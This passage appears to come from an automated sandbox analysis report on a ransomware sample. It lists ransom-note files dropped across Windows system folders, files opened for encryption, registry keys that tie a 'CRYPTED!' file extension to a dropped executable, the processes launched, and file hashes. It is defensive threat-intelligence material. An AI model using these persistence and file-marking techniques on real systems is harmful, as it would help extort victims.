| File created | C:\Program Files\Microsoft Games\SpiderSolitaire\ja-JP\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winsxs\amd64_prnlx00z.inf.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_5edfd7e62768255b\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-mmc-adm_31bf3856ad364e35_6.1.7600.16385_none_296b12551d57d47b\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_prnhp003.inf.resources_31bf3856ad364e35_6.1.7600.16385_en-us_0252a858dbbfc051\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-class_ss_31bf3856ad364e35_6.1.7600.16385_none_7390d7acc46c92ae\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft.windows.h..iverclass.resources_31bf3856ad364e35_6.1.7600.16385_en-us_be19f9194580ad14\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_de-de_0f8ccf36b90bab3b\404.htm | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-s..ls-nltest.resources_31bf3856ad364e35_6.1.7600.16385_en-us_6e114d9537aeda37\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_brmfcumd.inf.resources_31bf3856ad364e35_6.1.7600.16385_de-de_257117968cd8b9fd\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_megasr.inf.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_996f7e3998b0808b\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-n..rojection.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_135e1933af1da298\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-wcfcorecomp.resources_31bf3856ad364e35_6.1.7601.17514_es-es_a29d24bc97e24069\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\Media\Landscape\Windows Notify.wav | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-cryptui-dll.resources_31bf3856ad364e35_6.1.7601.17514_de-de_b8975dacc61ac776\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-http-api.resources_31bf3856ad364e35_6.1.7600.16385_it-it_3e121654162b74ac\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-i..rofilerui.resources_31bf3856ad364e35_8.0.7600.16385_ja-jp_ef4b494552357608\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-rasserver.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_083761eb9020e571\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_4db0b909695af8f9\11.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\Media\Raga\Windows Pop-up Blocked.wav | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v3.0\WPF\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-videosamples_31bf3856ad364e35_6.1.7600.16385_none_51a21f033003affd\Wildlife.wmv | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-vssservice.resources_31bf3856ad364e35_6.1.7600.16385_it-it_b5dc78d84eca21dc\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-f..rant-heap.resources_31bf3856ad364e35_6.1.7600.16385_it-it_9811e1810414cd08\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-scheduleui.resources_31bf3856ad364e35_6.1.7600.16385_en-us_a324c31e64989d11\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-imapiv2-base-mof_31bf3856ad364e35_6.1.7600.16385_none_af85c682fa6ec558\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-runas.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_3c984138d615a085\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\wow64_microsoft-windows-i..l-keyboard-00000446_31bf3856ad364e35_6.1.7600.16385_none_4fc3090ab0dcff53\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-h..homegroup.resources_31bf3856ad364e35_6.1.7600.16385_de-de_ab00b852533a224a\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\404-12.htm | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-wimgapi.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_bbb0bd0d14cecc41\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Design\52873358b397c328168f0a5be7f3b9ae\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-n..line-tool.resources_31bf3856ad364e35_6.1.7600.16385_en-us_16fdaa9adc6724e9\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\wow64_microsoft-windows-registry-editor_31bf3856ad364e35_6.1.7600.16385_none_5a78515e29ea6f39\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-m..tlocation.resources_31bf3856ad364e35_6.1.7600.16385_it-it_98ea21b18ee4fb73\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-n..qossnapin.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_8c62db6595e6b73a\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_prnle003.inf.resources_31bf3856ad364e35_6.1.7600.16385_de-de_39a4cb64d041a91d\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_27fbee50ef7f6588\about_split.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\x86_netfx-aspnet_webadmin_help_b03f5f7f11d50a3a_6.1.7600.16385_none_50f19738760fdcfc\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.Build.Fra#\a71fda14114136e528b310f41dce7915\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_mdmnis2u.inf_31bf3856ad364e35_6.1.7600.16385_none_ed46e0a714e373a9\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-d..providers.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_a1da744e8413e095\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_netfx-aspnet_webadmin_images_b03f5f7f11d50a3a_6.1.7600.16385_none_3b995fcfc0e586ab\headerGRADIENT_Tall.gif | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\msil_microsoft.powershel..nsolehost.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_8ca3b331398ac02e\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-u..evicehost.resources_31bf3856ad364e35_6.1.7600.16385_it-it_69b43efa2bb9b6c6\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft.windows.h..iverclass.resources_31bf3856ad364e35_6.1.7600.16385_it-it_4ac4c2430fab9a99\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-s..ion-agent.resources_31bf3856ad364e35_6.1.7600.16385_de-de_a81457131ab67d65\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\UIAutomationTypes.resources\3.0.0.0_de_31bf3856ad364e35\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-h..-winmeetb.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_4a4444b9f6d87dbc\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\msil_system.data.services.design.resources_b77a5c561934e089_6.1.7601.17514_es-es_93c826fd0070d2ce\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\msil_system.speech.resources_31bf3856ad364e35_6.1.7601.17514_es-es_683e1eec2434de10\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-advapi32_31bf3856ad364e35_6.1.7600.16385_none_3f3d4351a032bf57\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-help-langreg.resources_31bf3856ad364e35_6.1.7600.16385_it-it_8a1b676b5d7890df\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-s..dthemes-calligraphy_31bf3856ad364e35_6.1.7600.16385_none_c1407bc73caf8dfc\Windows Error.wav | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-s..ndthemes-characters_31bf3856ad364e35_6.1.7600.16385_none_08da32b0fdad9220\Windows Logon Sound.wav | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-w..per-tcpip.resources_31bf3856ad364e35_6.1.7601.17514_it-it_4dfed4407fd71215\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_7f0b185800a159c3\about_scripts.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-p..ooler-ppc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_51af68164268d4bf\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-a..e-results.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_601f89dfb9008ef8\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-ehome-ehglid.resources_31bf3856ad364e35_6.1.7600.16385_it-it_1655c33d107c8cc9\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-t..cesclient.resources_31bf3856ad364e35_6.1.7601.17514_es-es_76707b86cc8768df\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Globalization.Calendars\v4.0_4.0.0.0__b03f5f7f11d50a3a\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\wow64_microsoft-windows-com-complus-admin_31bf3856ad364e35_6.1.7600.16385_none_43b350887adefc43\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-g..tallation.resources_31bf3856ad364e35_6.1.7600.16385_it-it_88cdcb7606a01ada\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-help-mobctr.resources_31bf3856ad364e35_6.1.7600.16385_it-it_f66376775fe54990\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-mydocs.resources_31bf3856ad364e35_6.1.7600.16385_de-de_effd1cf37c79db0a\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Bl9c98vcvv\ = "RRAHKKYNJVTSHLG" | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\ = "CRYPTED!" | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\shell\open\command | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\shell\open | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RYiGElV1ZFlQ3US.exe" | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.Bl9c98vcvv | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RYiGElV1ZFlQ3US.exe,0" | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\shell | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe
"C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\HOW TO DECRYPT FILES.txt
Network
Files
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\HOW TO DECRYPT FILES.txt
| MD5 | 88de38daafc64c8ec113507d490c9d7d |
| SHA1 | a51b5c3ee4c306b1a3ec68c0cfaaf41bef29e1e4 |
| SHA256 | f78cde7119f31d0e3ba5aafd8b932c342f5e762c5f8a1a3c7b115133c1f9f1ec |
| SHA512 | 3e3b42d9c2b42a24fe753dd2e24df8405edcc0c89bdba78bd4e20e5f83faa372a23008d0e7f568f4210a4935a68a1a03eebeb4e30954e5cb56542016295ddb71 |
C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif
| MD5 | df04943e663f25cc1c915b6dcd28552f |
| SHA1 | 68cd5574c7e213f1ad89384d66fe673695eeaa01 |
| SHA256 | 2caa4056f47fe5029b33a4bd71fd871b453a2d9a1f6bf54080bcf96a1628161e |
| SHA512 | 91848776349f491a40c3d906d60222d519a651be2e13686781ce186af0affd53cc06fb22e32d0f51e1d9dd02d1c5346cfd0c350711c2876af2412e9310102ab2 |
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html
| MD5 | 3ae734077b18a8ddd1d80a9500c653f0 |
| SHA1 | 8e84106f2126a7a4439090b73e5407cb3883db93 |
| SHA256 | 4b6ce89363b1ec7a21b6eb1dfdf614accb44bf35b98f70f477a0411ed070686b |
| SHA512 | 540a19e0f225ec44683c06488e53e679c8cc7e368a97b5c23ecdbd0abd86500c2cd37fe37c5146de37760820821c0cf856ca21c6fd79d6c3086e70917eb44d89 |
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html
| MD5 | 1796bbfa3b1c87c5028e6b5029f03675 |
| SHA1 | 606d2d25f3ecf65951076c9de77bc6ea83e05bd5 |
| SHA256 | 8f01ee0b137344ace9670b2cca619921480d87758a1a84c4b7bea3d409ccf204 |
| SHA512 | 6ad2c93c9118759eea580d9243b4c1e441ffb0b1864e187f0b38b350e1034867c45f69f4b61bfa714906bb9f75c6ddd74048302da39bd68a845014a5f8f49162 |
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt
| MD5 | 3d241c1f6c53320365ee2f4da16648f5 |
| SHA1 | 89c112fc20f7a79df5ed54524b2135aef5429ca5 |
| SHA256 | 72bc9858f046fb4f2c775a548918f5dfc9c5661059bdfa9219b4b4d5c10bb79b |
| SHA512 | e59de06b1ed25f2d7b66baf63dc41f78a9adf6f858cfae2881424e0c853f308b291da0abf3f776cfee0b5783bc6f4e4d8d9fcf46eeac4280b3a03255942db393 |
C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt
| MD5 | 06573512904de85494f3d731b967280f |
| SHA1 | 2f4c18c5afcdcf502b7be1e2a41bce2493f3087a |
| SHA256 | 26361b8196f8d1ae24f70cb63f46b53d3072b6dcd671bc2ee965f96d1bac22b4 |
| SHA512 | a32e8dcf2059eb7b36bd57a08c6595279d5021fffbcfb6ae377d52547711dced382e82b0054136b2d9ca26b03d55b329e0241998150ad3e9372dd605c41b1792 |
C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt
| MD5 | 7d35c42c103870664c1395937302ef85 |
| SHA1 | 1a06c8c5a2f893edf2c8f6ad7bdd6ccd7b027f81 |
| SHA256 | 91087c3c38ccd4bd98aa8de8e4e115bb8a3e27b1887958ce97c39dfbd864969b |
| SHA512 | bfab1bf7680a55a93c204ba2268f88cf08a02aa59d513a63606fca99c554e440b35605c772272688401f17e86ec44cb5e842bec361735b3c67663c34d1271460 |
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF
| MD5 | 569ad6fbea02fda902db544bfe5b560c |
| SHA1 | b9f7d07750c1514bd3a81e24d5e621b942c68795 |
| SHA256 | d03a917333f025405ea893296bf0ddbf1e61600cab48b9bfa53353548cdf811c |
| SHA512 | b76a5d688a219dd563c3dab59e3b0b45315a19eb0e55ee4bf0c95287864978e40b90575e008a3f23fc6014894273bb0cfa728a14f6b2c800605d3900d6a2b079 |
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF
| MD5 | 3cedc7540fa583e9f12a2cfa2e1ee434 |
| SHA1 | d318f6fa6db7837b9bd55962d24eea333bd12273 |
| SHA256 | 7775255f9bc33571b3d4b4aa598b27938391a7ff334fe88e268cd7636ef8653e |
| SHA512 | 497dac219a581ffebc33af36864f323fa550e67c0b5c5fac835600ca5e4a5e6f56f2c1ebb5ec26b4b8413e2e72191faf7207c0ad712403b0edcd26169ee9ff73 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF
| MD5 | 413f5698d7156e6e32a284ebe6e5ac3a |
| SHA1 | 8896785394896e21b46dda93f984660881cf491b |
| SHA256 | 962e28a7260f7d42b11fc8be92cf992d721addb7567f201b1154a2d123b51467 |
| SHA512 | 04474fe2aae603b89e36e7e93ac3bf2580cbb80e74228439eac774114af20b4b1771f7c0d31fa2ec817fe355c7c9e6066903823e303dad1c2c4840c8f83db0e5 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif
| MD5 | d117292646a12453e7b5582cc4a541ea |
| SHA1 | d7ef02e44ce9ff4500ee8aff2173e34ff62e6a7a |
| SHA256 | fbd8ec4929d82b0e7c6c581fa88a343028d988e94f9d6422f03b1f062535ae65 |
| SHA512 | 8b6d21e86c55ca89a7e6f9ad4eead783528c4d4cb05c7b5a418fcfd99b7b095a5ca7e2af8522d5683abb88b18ddbf081887597e9a17352fdf2de68cdc150d699 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Country.gif
| MD5 | 8aad792af7373ee17d92cdfd2d7a2ac1 |
| SHA1 | 65661b9430a24792c8eaf561aea97f906579a88f |
| SHA256 | 2d969b3affb3a6551191abceacffd3adbaa713843e3eccfdce6a07b1993784fa |
| SHA512 | 8f797b4594f9b8c94b66286c0bf2583ffb3a390f061753820035c5ffdbefcc5bf04e8707938a9ce88ff601899671ea8edab005258e3802bb5fa1a3e37b20d19b |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif
| MD5 | f63b67c513817864ecd976a89e19fc99 |
| SHA1 | 49e4847df6b91c47ea2d03872ff4713e951c2d9a |
| SHA256 | 89a05d288f89e82b79f64691aaf3d8fa8205cedd768b9b1904503c638323ff72 |
| SHA512 | c60cbf149c24b4766c6e06bf5b2e8ebcad3706a1ab255c668ad0d944f53492e609c0c87f4f2229255ea07c7c01fdb948387cdc7538fa8bf4e6fcb0f10ee62e27 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_GreenTea.gif
| MD5 | 7848bdf44fb668d78d19a4d3ff99948a |
| SHA1 | 69323c631a1187c24add7c3cfe259bf0b1f5b7d8 |
| SHA256 | abf988892540b7e9179da9f763464d12f65e24f3503cad35692d656896ceb5e5 |
| SHA512 | fd6b9daf56d3a5cef8a7f9803d345268dbd0588a6b3cae55e0750451daeaf47d52b0c5a41d828a124a940dff25db27b6fa2d07fde45da7a23cbfa3d0d05348b3 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif
| MD5 | f8b4416ac2848fe0262e5f4b989bf158 |
| SHA1 | d4d8d9b7e9b38edd990e3d6013d4c8aec5fd8068 |
| SHA256 | b4cf2ee8894287ba0f3da5a85247893e5519e2e3d977db3edc0c7f9c29bcd618 |
| SHA512 | c9ba07dafc1a9ea0604bd18d8ae195deec11eeb7398447fe137fa36785ea902631e641674370c53b4cc37d4e32d10c8d744f67a74795ddc5481778e9df4fe188 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_LightSpirit.gif
| MD5 | b89eeb5c362155dd26dcdacd12eaad5a |
| SHA1 | bb5fdd503b81c24210827024085b029af5883213 |
| SHA256 | a0ab011d0e97f1da97658b8653620892a06c347d226de1abd88df75c1463cb1a |
| SHA512 | 6a9ac284f3122b2be257f22d3e3d4c863a7b1c4ce515a040e8078985967d63366e321a964e57fd3d7c2b51b36a36c1a8f2039e7c5864043623ddfae40e5fbef0 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_OliveGreen.gif
| MD5 | becb69d0debbd5cfeb4348432a3816f9 |
| SHA1 | 43c10881308a29f33e28d806f4954fcb08c10200 |
| SHA256 | f44aea688e58a801f9c394c945d514d174529132a7a86fbbb5474c331faf7123 |
| SHA512 | aa936d041cd64e183abbb80214c362472ee379b8fd372a732fcff4d89502d398146bf37d665799acceafc8ba434e941248c2421a431225c2aa4dcfd2ccf5b202 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Premium.gif
| MD5 | 6dfba97a2239211be4ce12311dbcb20a |
| SHA1 | fb721cb7ff575a19def531dd08b9db8fd760763e |
| SHA256 | eba9f474b3243e0309793f66cbf356e68640828ebbc7bf125a420813e16fd860 |
| SHA512 | e455f19ec41d2349646c2df21b09e657e36084cf230787cfbcd0ebe600e889bcf505af883795078520277c0ce2b1e099e22c54eea8c36c8edfb5f07331ee3a3c |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_SlateBlue.gif
| MD5 | e97f409fe50921ad87b82e5c877c705a |
| SHA1 | 415311d6ab339f272d2adfbb55408abfcdc68ef5 |
| SHA256 | a0ffbd052c685fcdf32375f68f4d99606d1edc910ddc693dfe2af5130452a633 |
| SHA512 | 2c3157637c5610e97add6aea20f8e38da0cc6ac36df4084c5f6b51991e340d0ee31ec7426b897e9fd2d3208026686580b924d806f0f3f79548e108796b5cb319 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif
| MD5 | 7e38398ce1f75907facf403527a5b342 |
| SHA1 | 2c19cf32ac42b4a259fa7c47f412191f3554a481 |
| SHA256 | 82d74d54fc3c2a0d40be21921f49d4e7b2a47c0f46e38d4fd77f3dff9a9bc5ab |
